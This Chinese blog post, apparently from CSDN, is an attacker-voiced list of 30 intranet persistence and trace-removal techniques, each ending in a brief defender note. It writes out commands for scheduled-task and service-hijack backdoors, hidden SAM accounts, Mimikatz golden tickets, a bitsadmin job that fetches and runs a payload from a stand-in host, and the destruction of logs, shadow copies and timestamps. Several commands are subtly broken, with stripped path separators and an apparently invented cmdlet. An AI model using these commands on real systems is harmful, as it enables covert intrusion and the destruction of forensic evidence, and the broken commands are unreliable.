内网沦陷后的“隐身术”大揭秘！（非常详细）从零基础到精通，收藏这篇就够了-CSDN博客

本文链接：https://blog.csdn.net/Javachichi/article/details/147854443

内网攻防，就像猫鼠游戏。攻破防线只是开始，真正的较量在于如何“隐身”和“赖着不走”。权限维持和痕迹清理，直接决定了黑客能否在你的网络里“长住”。别以为30招就够了，这只是冰山一角！

第一部分：权限苟且：15个让你防不胜防的后门姿势

“定时炸弹”：计划任务的障眼法
- 黑客骚操作：schtasks命令，简直是Windows自带的“定时炸弹”。伪装成系统服务？小菜一碟！比如，把任务名称改成MicrosoftEdgeUpdate，谁会怀疑？
- 命令示例：schtasks /create /tn "MicrosoftEdgeUpdate" /tr "C:malware.exe" /sc hourly，简单粗暴，每小时执行一次恶意代码。
- 防御方的无奈：盯着计划任务里那些“来路不明”的程序路径吧。但问题是，谁能保证不漏掉一个？
“寄生兽”：服务注入的阴险
- 黑客骚操作：系统服务，谁不用？但如果服务“变异”了呢？攻击者会劫持像Print Spooler这样的“老实人”，把它的二进制路径指向恶意DLL。
- 命令示例：sc config spooler binPath= "C:WindowsSystem32mal.dll"，一行命令，狸猫换太子。
- 防御方的挣扎：启用服务签名验证？理论上可行，但实际部署起来，各种兼容性问题能让你头大。
注册表“钉子户”：开机启动的潜伏
- 黑客骚操作：注册表，Windows的心脏。在HKCUSoftwareMicrosoftWindowsCurrentVersionRun或者HKLM里埋个雷，开机就炸。
- 隐蔽技巧：用CLSID混淆键名，比如{AB3D1234-...}，让管理员眼花缭乱。
- 防御方的疲惫：部署注册表变更告警？可以，但每天成百上千的告警，你能Hold住？
启动文件夹的“糖衣炮弹”
- 黑客骚操作：把恶意快捷方式（.lnk）扔进%AppData%MicrosoftWindowsStart MenuProgramsStartup，用户一开机就中招。
- 升级版：用.url文件伪装成合法文档，迷惑性更强。
- 防御方的局限：限制用户目录写入权限？这可能会影响用户的正常使用，得不偿失。
WMI“定时器”：事件订阅的魔爪
- 黑客骚操作：WMI，Windows Management Instrumentation，一个强大的管理工具，也是黑客的武器。注册WMI事件过滤器，比如用户登录时触发后门。
- 脚本示例：
powershell $filterArgs = @{ EventNamespace='rootcimv2'; QueryLanguage='WQL'; Query="SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LogonSession'" } $consumerArgs = @{ Name='MalConsumer'; [ScriptingEngine]='JScript'; ScriptText='...' }
- 防御方的挑战：定期审计__EventFilter/__EventConsumer类？听起来简单，但手动操作费时费力，自动化脚本又容易被绕过。
“影子替身”：影子账户的瞒天过海
- 黑客骚操作：通过注册表添加隐藏账户，把F值修改为0x3e9，让账户在登录界面消失。
- 命令示例：reg add "HKLMSAMSAMDomainsAccountUsers003E9" /v F /t REG_BINARY /d ...，修改注册表，神不知鬼不觉。
- 防御方的无奈：检查SAM中用户RID是否连续？这需要对Windows底层有深入的理解，一般安全工程师很难做到。
“金蝉脱壳”：黄金票据的横行霸道
- 黑客骚操作：拿到域控的KRBTGT哈希，就能伪造TGT票据，在域内畅通无阻。
- 生成示例：kerberos::golden /user:Administrator /domain:contoso.com /sid:S-1-5-21-... /krbtgt:hash /ptt，用Mimikatz轻松搞定。
- 防御方的噩梦：定期重置KRBTGT密码？这是个好主意，但每180天一次，运维团队会疯掉的。
ACL“通行证”：权限控制的暗箱操作
- 黑客骚操作：为关键进程（如LSASS.exe）添加调试权限，就能为所欲为。
- 命令示例：Set-ProcessSecurityDescriptor-Name lsass -Right GenericAll -Allow，赋予攻击者完全控制权限。
- 防御方的困境：监控敏感进程的ACL变更？这需要专业的安全工具，而且误报率可能会很高。
DLL“李代桃僵”：劫持的艺术
- 黑客骚操作：替换系统目录（如C:WindowsSystem32）中未签名的DLL，让应用程序加载恶意代码。
- 进阶技巧：利用DLL搜索顺序劫持应用程序，成功率更高。
- 防御方的挣扎：启用DLL签名强制验证？这可能会导致某些应用程序无法正常运行，需要谨慎评估。
RID“乾坤大挪移”：身份互换的诡计
- 黑客骚操作：修改低权限用户的RID为500（管理员RID），瞬间变身管理员。
- 操作示例：用Mimikatz调整注册表F字段，实现RID劫持。
- 防御方的挑战：检查用户SID与RID的合法性？这需要编写复杂的脚本，而且容易被攻击者绕过。
COM“偷梁换柱”：组件劫持的陷阱
- 黑客骚操作：注册恶意COM组件，劫持MMC或Office调用链，实现持久化控制。
- 注册表路径：HKCRCLSID{...}InprocServer32，这里是COM组件的“老巢”。
- 防御方的难题：禁用未签名的COM组件加载？这可能会影响某些应用程序的兼容性，需要仔细测试。
Hook“釜底抽薪”：API Hooking的阴招
- 黑客骚操作：注入WS2_32.dll的connect函数，实现网络通信重定向，窃取敏感信息。
- 工具推荐：使用Detours库实现函数劫持，简单易用。
- 防御方的困境：启用驱动签名验证？这可以防止恶意驱动加载，但无法阻止所有Hooking攻击。
Bits“暗度陈仓”：后台下载的秘密通道
- 黑客骚操作：利用后台智能传输服务（BITS）下载恶意负载，隐藏在后台偷偷运行。
- 命令示例：
powershell bitsadmin /create backdoor bitsadmin /addfile backdoor http://mal.com/payload.exe C: empsvchost.exe bitsadmin /SetNotifyCmdLine backdoor C: empsvchost.exe NULL
- 防御方的挑战：审核BITS任务列表？这需要定期检查，而且容易被攻击者伪装。
域信任“瞒天过海”：跨域提权的捷径
- 黑客骚操作：在跨域信任场景中利用SID History属性提权，获取目标域的控制权。
- 操作示例：用Mimikatz添加域控的SID至用户属性，实现跨域提权。
- 防御方的无奈：禁用不必要的域信任关系？这可能会影响业务的正常运行，需要谨慎评估。
Office宏“温柔一刀”：文档陷阱的诱惑
- 黑客骚操作：在Normal.dotm模板中嵌入恶意宏代码，用户启动Word时自动执行。
- 触发条件：用户必须启用宏执行，但很多人对此并不了解。
- 防御方的局限：启用宏执行限制？这可以防止恶意宏执行，但也会影响用户的正常使用。

第二部分：抹去存在的痕迹：15个“毁尸灭迹”的绝招

Windows事件日志“大清洗”
- 工具：wevtutil cl Security，一键清除安全日志，简单粗暴。
- 进阶：使用内存注入技术直接操作eventlog.service进程，绕过日志记录。
- 防御：启用日志转发至SIEM系统，防止本地日志被篡改。
IIS日志“选择性失忆”
- 路径：C:inetpublogsLogFilesW3SVC1，Web服务器的“日记本”。
- 技巧：仅删除特定时间段的日志条目，避免全量删除引起怀疑。
- 防御：配置日志文件ACL为只读，防止被篡改。
防火墙规则“恢复出厂设置”
- 操作：删除新增的放行规则，比如netsh advfirewall firewall delete rule name="mal_rule"。
- 隐蔽：复用已有规则名称，比如Remote Desktop，混淆视听。
- 防御：基线化防火墙规则并监控变更，及时发现异常。
文件时间戳“整容术”
- 工具：timestomp.exe -m "01/01/2020 08:00:00" malware.exe，修改文件时间戳，伪装成系统文件。
- 技巧：将时间戳与系统文件保持一致，避免被发现。
- 防御：启用文件完整性监控（FIM），检测文件是否被篡改。
内存“深度清洁”
- 技术点：卸载恶意驱动后调用ExAllocatePool覆盖内存区域，清除内存痕迹。
- 工具：使用BOF（Beacon Object Files）实现无文件擦除，更加隐蔽。
- 防御：部署内存扫描工具，检测内存中的恶意代码。
回收站“无情抹杀”
- 命令：del /f /q /s *.*配合shift+delete彻底清除文件，不留痕迹。
- 增强：使用cipher /w:C:覆写磁盘空闲空间，防止数据恢复。
- 防御：审计敏感目录的文件删除操作，及时发现异常。
预读取文件“一键清理”
- 路径：C:WindowsPrefetch，记录程序启动信息的“小本本”。
- 操作：定期执行del /f /q C:WindowsPrefetch*.pf，清除预读取文件。
- 防御：禁用预读取功能，但可能会影响系统性能。
卷影副本“斩草除根”
- 命令：vssadmin delete shadows /all /quiet，删除卷影副本，防止数据恢复。
- 对抗：在提权后优先删除卷影，防止取证分析。
- 防御：限制vssadmin执行权限，防止被滥用。
RDP连接记录“擦除记忆”
- 注册表路径：HKCUSoftwareMicrosoftTerminal Server ClientServers，记录RDP连接历史的“小秘密”。
- 自动化：编写脚本批量删除历史IP记录，提高效率。
- 防御：启用RDP连接日志审计，记录RDP连接信息。
浏览器历史“一键还原”
- 工具：使用BrowsingHistoryView导出并删除Chrome/Firefox记录，清理浏览器历史。
- 进阶：劫持浏览器扩展自动清理历史，更加隐蔽。
- 防御：监控浏览器进程的异常行为，防止被篡改。
PowerShell日志“瞒天过海”
- 技术点：通过-WindowStyle Hidden -ExecutionPolicy Bypass隐藏执行窗口，绕过日志记录。
- 日志清除：删除Microsoft-Windows-PowerShell%4Operational.evtx，清除PowerShell日志。
- 防御：启用模块日志记录（ScriptBlockLogging），记录PowerShell脚本内容。
WMI日志“移花接木”
- 路径：Applications and Services LogsMicrosoftWindowsWMI-Activity，记录WMI操作的“蛛丝马迹”。
- 难点：需停止Winmgmt服务后操作日志文件，操作复杂。
- 防御：启用WMI活动审计策略，记录WMI操作信息。
Linux utmp/wtmp“时光倒流”
- 文件：/var/run/utmp、/var/log/wtmp，记录用户登录信息的“史书”。
- 命令：使用utmpdump工具编辑登录记录，修改登录时间。
- 防御：配置ttylog实时记录会话内容，防止被篡改。
数据库日志“乾坤挪移”
- MySQL：PURGE BINARY LOGS BEFORE '2024-01-01';，删除指定日期前的二进制日志。
- MSSQL：执行EXEC sp_cycle_errorlog;循环日志文件，覆盖旧日志。
- 防御：启用数据库审计并异地存储日志，防止本地日志被篡改。
云平台日志“釜底抽薪”
- AWS：通过DeleteLogGroup删除CloudTrail日志组，清除云平台操作记录。
- Azure：使用Remove-AzLogProfile清除活动日志配置，停止记录活动日志。
- 防御：启用云日志不可变性（Immutable Storage），防止日志被删除。